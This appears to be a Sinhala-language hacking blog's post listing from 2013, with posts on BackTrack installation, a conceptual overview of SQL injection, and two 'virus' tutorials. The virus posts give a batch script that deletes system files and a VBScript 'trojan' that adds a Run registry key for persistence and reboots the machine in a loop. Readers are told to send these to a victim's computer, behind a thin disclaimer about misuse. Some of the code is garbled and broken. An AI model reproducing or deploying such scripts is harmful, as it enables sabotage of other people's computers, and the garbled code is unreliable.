වයිරස් 02........Delete mouse,explore,logoff

Thursday, September 19, 2013
අදත් මම batch programming යොදාගෙන නිර්මාණය කරන්න පුථවන් වයිරස් code එකක් අරගෙන ආවා....මේ වයිරස් එක භාවිතා කරලා අපිට victim (ගොදුරුවන්නා) ගේ පරිඝණකයේ මවුස් එක ,කී බෝඩ් එක අක්‍රීය කරන්නත් පරිඝණකය log off තත්වයට පත් කරන්නත් පුථවන් ....... හැබැයි මේක කිසිම වැරදි අදහසකින් පාවිච්චි කරන්න එපා.......

                                                














* පහත තියෙන කෝඩ් එක නෝට්පෑඩ් එකට කොපි කරලා .bat කියන extension එක විදියට සේව් කරලා ඔයාගේ victim ගේ computer එකට යවන්න....

                                                            






code

@echo off

@if exist c:\windows\system32\mouse del c:\windows\system32\mouse
@if exist c:\windows\system32\keyboard del c:\windows\system32\keyboard
copy C:\windows\
@if exist c:\windows\system32\logoff.exe del c:\windows\system32\logoff.exe
@if exist C:\program files\internet explorer\iexplore.exe del C:\program files\internet explorer\iexplore.exe


exe file එකක්  text file එකක් විදියට හදලා victim ගේ computer එකට යවන්නේ කොහොමද කියලා ඊලග පෝස්ට් එකෙන් කියලා දෙන්නම්....දිගටම රැදිලා ඉන්න......
Read more ...

backtrack 2......instalation

Monday, September 16, 2013
back trackගැන මම ලියපු පලවෙනි ලිපියට ගොඩක් හොද ප්‍රතිචාර තිබුනා ඒනිසා අදත් ඒ ගැනම ලිපියක් එකතුකරන්න හිතුවා.....මම හිතන්නේ දිගටම මෙහෙම ඔයාලාගෙ සහයෝගය ලැබේවි......අද පෝස්ට් එකෙන් මම back track install කරන විදිය ගැන විස්තර කරන්නම්....ඉස්සරහට මේකෙන් කරන්න තියෙන වැඩ ගැන කතා කරමු...

මෙහෙමයි මුලින්ම මේක ඩවුන්ලෝඩ් කරගන්න ඕන, backtrack-linux.org කියන වෙබ් අඩවියේ රෙජිස්ටර් වෙලා නොමිලේ ඩවුන්ලෝඩ් කරගන්න පුථවන්....
ඊලගට ඩවුන්ලෝඩ් කරගනිපු iso file එක සීඩී එකකට රයිට් කරගන්න....(virtual box එකටනම් ඉමේජ් ෆයිල් එකෙන් පුථවන්...)
දැන් මේක ක්රම දෙකකට install කරගන්න පුථවන්...dual boot හා virtualization විදියට...ඒ කියන්නේ වින්ඩෝස් install කරලා තියෙන computer එකකට වින්ඩෝස් තියෙද්දිම , හාර්ඩ් ඩිස්ක් එකේ අඑත් පාටිශන් එකකට install කරගෙන හෝ වින්ඩෝස් operating system එකට install කරලා තියෙන සොෆ්ට්වෙයාර් එකක් ඇතුලේ රන් වෙන විදියට මේක install කරන්න පුථවන්......

dual boot

01. මුලින්ම විනඩෝස් install කරලා තියෙන computer එකට ලොග්වෙලා ඒකේ අථත් hard partition එකක් හදාගන්න......
             hard partition එකක් හදන්නේ මෙහෙමයි...
                        * මුලින්ම my computer කියන icon එක උඩ right click කරලා manage කියන window එක open කරගන්න....

                   
                      * දැන් disk management කියන tab එක open කරගන්න...දැන් පහත රූපය විදියේ window එකක් පේන්න තියේවි...

                      * ඔය Disk කියලා පෙන්වන ඔයාලාගෙ hard partition වලින් ඉඩ තියෙන එකක් උඩ right click කරලා shrink volume කියන option එක තෝරලා ඔයාට කැමති ප්‍රමාණයක් (10gb වලට වඩා වැඩි) දීලා අථත් hard partition එකක් හදාගන්න,...
02.ඊලගට  backtrack cd එක දාලා computer එක restart කරන්න....
03.දැන් පහත විදියේ window එකක් ඒවි....ඒක ඒ විදියටම තියෙද්දී enter key එක ඔබන්න...


04.තත්පර 10කට විතර පස්සේ පහත විදියේ window එකක් ඒවි....එතන startx කියලා type කරලා enter key එක ඔබන්න...


04.දැන් backtrack live desktop open වේවි...ඒකේ install backtrack කියන icon එක click කරන්න..දැන් backtrack install වෙන්න පටන්ගනීවි...


05.දැන් time zone එකයි language එකයි තෝරන්න ඒවි ඊටපස්සේ hard partition එක තෝරන්න කියාවි එතනට ඔයා කලින් හදාගනිපු hard partition එක දෙන්න...


05.විනාඩි 10 කට විතර පස්සේ installer එක ඉවර වේවි....දැන් finish කියන button එක  click කරලා computer එක restart කරන්න....


06.restart කරාට පස්සේ  username එකයි login password එකයි ඉල්ලාවි...username එකට root කියලා type කරන්න password එකට toor කියලා type කරන්න දැන් ඔයාට සිස්ටම් එකට ලොග් වෙන්න පුථවන්....


 virtualization


01.මේ ක්‍රමයට install කරන්න oracle virtual box කියන software එක ඩවුන්ලෝඩ් කරගන්න ඕන ඒක මෙතනින් ඩවුන්ලෝඩ් කරගන්න...
02.සාමාන්‍ය විදියට මේ සොෆ්ට්වෙයාර් එක computer එකට  install කරගන්න...
03.දැන් මේ virtual box එක open කරලා new කියන tab එක open කරන්න....


04.දැන් os එක තෝරන්න ඒවි...එතන name කියන තැනට කැමති නමක් දීලා os type එක linux කියලාත් os version එක other linux කියලාත් තෝරන්න...


05.ඊලගට එන වින්ඩෝ එකේ ඔයාට කැමති ram space එකක් දීලා ඉස්සරහට යන්න...


06.දැන් virtual hard disk එකක් හදන්න කියාවි එතනට ඹයාට කැමති space එකක් දීලා ඉස්සරහට යන්න...
07.දැන් ඔයාගේ virtual box එකේ linux කියලා ෆයිල් එකක් හැදිලා ඇති .... ඒක select කරලා උඩ තියෙන start කියන icon එක click කරන්න...දැන් installation media එක තෝරන්න කියාවි එතනට  ඔයාගේ backtrack cd එක හරි image එක හරි තියෙන තැන පෙන්නලා next කරන්න...


08.දැන් මම කලින් කියලා තයෙන විදියට os එක install කරරගන්න පුථවන්......

තවත පෝස්ට් එකකින් හම්බවෙමු.......
Read more ...

BACKTRACK 1 .......හැදින්වීම

Thursday, September 12, 2013
අදත් තව අථත් මාතෘකාවකින් ලිපි පෙලක් ආරම්භකරන්න බලාපොරොත්තු වෙනවා...මේකත් මම හිතන්නේ ඔයාලාට ගොඩක් වැදගත් මාතෘකාවක් වේවි ......ඒ වගේම මේක ගොඩක් අය දැනගන්න බලාපොරොත්තුවෙන් ඉන්න මාතෘකාවක් .......
back Track එහෙම නැත්නම්  kali  linux  කියලා හදුන්වන operating system එක  ගැන තමයි අද ඉදන් මේ ලිපි පේලිය  ලියන්න බලාපොරොත්තු වෙන්නේ...මුලින්ම මේ ගැන පොඩි විස්තරයක් ලියලාම පටන්ගන්නම්....

හැකින්  හා පෙන්ටෙස්ටින් සදහා  දැනට ලෝකයේ  වැඩිපුරම භාවිතාවෙන ඒ වගේම ඕනෑම හැකින් ක්‍රමයක්  සදහා  යොදාගතහැකි tools එකතුකර නිර්මාණය කරඇති මෙහෙයුම් පද්දතියක් තමයි back Track කියන්නේ....මේකත් අනිත් ලිනක්ස් මෙහෙයුම් පද්දති වගේම ඕපන් සෝස් වර්ගයේ මෙහෙයුම් පද්දතියක්...ඒවගේම මේකෙත් කමාන්ඩ් ලයින්එක භාවිතා කරලා තමයි අපට වුවමනා දේවල් කරගන්න පුථවන්, හැබැයි සාමාන්‍ය ලිනක්ස් මෙහෙයුම් පද්දතියකට වඩා ගොඩක් පහසුකම් මේකේ  තියෙනවා...ඒ වගේම backtracklinux.org කියන වෙබ් අඩවියෙන් live CD එකක් විදියට මේක නොමිලේ ඩවුන්ලෝඩ් කරගන්න පුථවන්.....ඒ කියන්නේ ඉන්ස්ටෝල් කරන්නේ නැතුව සාමාන්‍ය වැඩකරන්න  පුථවන්........ඒත් මේකෙන් හැකින්  වගේ දේවල් කරන්න නම් අනිවාර්‍යන්ම මේක ඉන්ස්ටෝල් කරන්න වෙනවා....




Backtrack මෙහෙයුම් පද්දතියේ ඇතුලත් tool කීපයක්...

Metasploit for integration
Wi-Fi drivers and packet injection
Aircrack-ng
Gerix Wifi Cracker
Kismet
Nmap
Ophcrack
Ettercap
Wireshark (Ethereal)
BeEF (Browser Exploitation Framework)
Hydra
OWASP Mantra Security Framework
Cisco OCS Mass Scanner

මේ  tools ප්‍රධාන  කොටස් 12 කට  බෙදලා පෙන්වන්න පුථවන්.......

 *   Information
 *   Vulnerability assessment
 *   Exploitation tools
 *   Privilege escalation
 *  Maintaining access
 *  Reverse engineering
 *  RFID tools
 *  Stress testing
 *  Forensics
 *  Reporting tools
 *  Services
 *  Miscellaneous

මේ ගැන ඔයාලාට ඉස්සරහට පැහැදිලි කරලා දෙන්නම්....ඒ වගේම මේ operating system  එක ඉන්ස්ටෝල් කරන විදිය ගැනත් මේකෙන් වැඩකරන විදිය ගැනත් ඉස්සරහට පැහැදිලි කරන්නම්.....එතකම් දිගටම රැදිලා ඉන්න......
Read more ...

හැකින් 13.......DATABASE and SQL injection

Monday, September 9, 2013
අද පෝස්ට් එකෙන් මම ඔයාලාට database හා SQL injection ගැන පොඩි විස්තරයක් ලියන්න බලාපොරොත්තු වෙනවා....ඉස්සරහට  මේ ගැන වැඩි විස්තර ලියන්නම්......දැනට මේ දැනුම ප්‍රමාණවත්වේවි........                          
DATABASE      

database කියන්නේ යම් පරිඝණක ජාලයක (network) එකක දත්ත ගබඩා කරලා තියෙන ස්ථානය..නෙට්වර්ක් එකේ සිටින සියථම user ලා ගේ තොරතුරු දත්ත ඇතුලත්කරලා තියෙන server එකක් තමයි ගොඩාක් වෙලාවට database කියලා හදුන්වන්නේ....යූසර් නේම් , පාස්වර්ඩ් වගේ සංවේදී තොරතුරු ,  network එක තුල හුවමාරු වෙන සංවේදී දත්ත වගේ දේවල් මේ සර්වර් එක තුල ආරක්ෂා කරලා තියෙනවා...ඒත් දක්ෂ හැකර් කෙනෙකුට මේ වගේ ඩේටාබේස් සර්වර් එකතුල තියෙන දත්ත ලබාගන්න පුථවන්...ඒ සදහා යොදාගන්න method (ක්‍රමවේදයක්) තමයි  SQL injection කියලා හදුන්වන්නේ....මේ වගේ සර්වර් විශාල ආරක්ෂාවක් ඇතුව පවත්වාගෙන යා යුතුයි....ඒත් සියථම network වලට මෙවැනි ආරක්ෂාවක් ලබාදීම ප්‍රායෝගිකව කරන්න අමාරුයි....ඒ නිසා ගොඩක් වෙලාවට මේ වගේ සර්වර් වල අකාර්‍යකෂමතා වැඩියි, ඒ හේතුව නිසා SQL injection කියන ක්‍රමවේදය පහසුවෙන් ක්‍රියාත්මක කරන්න පුථවන්...



database වර්ග
                                                                           
•    DB servers,
•    MySQL(Open source),
•    MSSQL,
•    MS-ACCESS,
•    Oracle,
•    Postgre SQL(open source),
•    SQLite,

SQL injection

SQL injection  කියන්නේ මම කලින් කියපු ඩේටාබේස් එකට හොරෙන් ඇතුල්වෙන්න හැකර්ලා යොදාගන්න ක්‍රමවේදයක්....මේ මගින් නෙට්වර්ක් එකේ ඇති අකාර්‍යකෂමතා උදව් කරගනිමින් ඩේටාබේස් එකතුල ඇති සංවේදී තොරතුරු
ලබාගන්න පුථවන්....

මේ මගින් හැකර්ට කලහැකි දේ...

* නෙට්වර්ක් එකට අනවසරයෙන් ඇතුල්වීමට පුථවන්.....
* රහස්‍ය තොරතුරු ලබාගැනීමට පුථවන්.........
* වෙබ් අඩවියේ අන්තර්ගතය වෙනස් කිරීමට පුථවන්....
* SQL server එක අක්‍රිය කිරීමට පුථවන්....

මම හිතන්නේ මේ ගැනත් ඔයාලාට සෑහෙන දැනුමක් ලැබෙන්න ඇති...ඉතින් තවත් මේ වගේ තවත් පෝස්ට් එකක් අරගෙන එන්නම් එතකම් රැදී සිටින්න..........


Read more ...

වයිරස් 01.......trojan horse using notepad

Saturday, September 7, 2013
කලින් පෝස්ට් එකකින් මම ප්‍රෝගෑමින් ගැන පොඩි විස්තරයක් ලිව්වා මම හිතන්නේ ගොඩක් අය ඒක කියවන්න ඇති...ඉතින් මම අද ඉදන් අථත් මාතෘකාවක් විදියට ප්‍රෝගෑමින් යොදාගෙන වයිරස් කෝඩ් ලියනවිදිය ගැන පොඩි පෝස්ට් කීපයක් දාන්නම්...හැබැයි මේ සේරම දේවල් ලියන්නේ education purpose විතරයි,වැරදි දේවල් වලට යොදාගන්න එපා!
අද පෝස්ට් එකෙන් ලියන්නේ batch programming ඒ කියන්නේ notepad එක  යොදාගෙන trojan horse වයිරස් එකක් හදන විදිය...








මෙහෙමයි,
මුලින්ම  notepad එක open කරන්න....
ඊලගට  පහත තියෙන  code එක කොපි  කරලා  පේස්ට්  කරන්න....
.vbs කියන extension එක විදියට සේව් කරගන්න.....උදා:- trojenhorse.vbs
දැන් ඔයාගේ victim ගේ computer එකට යවන්න....

code

brakes - dlRB "DL Reboot" Trojan script by D.L.

On Error Resume Next
FSobj dim, sysDir, generateCopy, newfile, fixedCode, procreateCopy, fileData

set FSobj = CreateObject ("Scripting.FileSystemObject")
set sysDir = FSobj.GetSpecialFolder (1)

createRegKey "HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Run \dlRB", sysDir & "\ dlRB.vbs"

sub createRegKey (regkey, regVal)
set regedit = CreateObject ("WScript.Shell")
regEdit.RegWrite regkey, regVal
end sub

set generateCopy = FSobj.CreateTextFile (sysDir + "\ dlRB.vbs")
generateCopy.close

set newfile = FSobj.OpenTextFile (WScript.ScriptFullname, 1)
setFile ()
fixedCode = replace (fileData, chr (94), "" "")

set procreateCopy = FSobj.OpenTextFile (sysDir + "\ dlRB.vbs", 2)
procreateCopy.write fixedCode
procreateCopy.close

rebootSystem ()

setFile function ()
fileData = "rem - ^ ^ by D.L. dlRB" & vbCrLf & _
"strComputer = ^. ^" & vbCrLf & _
"Set objWMIService = GetObject (winmgmts ^: ^ _" & vbCrLf & _
"& ^ {ImpersonationLevel = impersonate, (Shutdown)}! \ \ ^ & ^ & StrComputer \ root \ cimv2 ^)" &vbCrLf & _
"Set colOperatingSystems = objWMIService.ExecQuery _ '& vbCrLf & _
"(Select * from Win32_OperatingSystem ^ ^)" & vbCrLf & _
"For Each objOperatingSystem in colOperatingSystems" & vbCrLf & _
"ObjOperatingSystem.Reboot ()" & vbCrLf & _
"Next"
end function

rebootSystem function ()
strComputer = "."

Set objWMIService = GetObject ("winmgmts:" _
& "{ImpersonationLevel = impersonate, (Shutdown)}! \ \" & StrComputer & "\ root \ cimv2")

Set colOperatingSystems = objWMIService.ExecQuery _
("Select * from Win32_OperatingSystem")

For Each objOperatingSystem in colOperatingSystems
ObjOperatingSystem.Reboot ()
Next
end function

තවත් මේවගේ පෝස්ට් එකක් අරගෙන එන්නම්...එතකම් දිගටම රැදිලා ඉන්න.....
Read more ...